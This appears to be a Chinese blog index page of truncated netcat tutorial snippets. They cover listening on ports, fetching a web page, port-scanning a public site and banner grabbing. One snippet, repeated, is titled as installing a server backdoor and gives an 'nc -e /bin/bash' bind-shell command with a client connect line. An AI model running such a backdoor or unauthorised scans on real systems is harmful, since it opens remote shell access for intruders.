netcat nc 几个例子
nc(netcat) 几个例子 服务器上安后门 # server nc -l -vv -p 5879 -e /bin/bash # client nc -v 192.16.1.54 5879 #
...Read more...
数人世相逢,百年欢笑.
nc(netcat) 几个例子 服务器上安后门 # server nc -l -vv -p 5879 -e /bin/bash # client nc -v 192.16.1.54 5879 #
...Read more...
监听入站连接 $ ncat -l 8080 连接远程系统 ncat 192.168.1.100 80 GET / HTTP/1.1 # 获取完整的网页内容 GET / HTTP/1.1 # 获取
...Read more...
扫描端口 netcat -z -v -w 1 www.baidu.com 70-90 查看banner netcat -v www.baidu.com 80 即时通讯 #server nc -l
...Read more...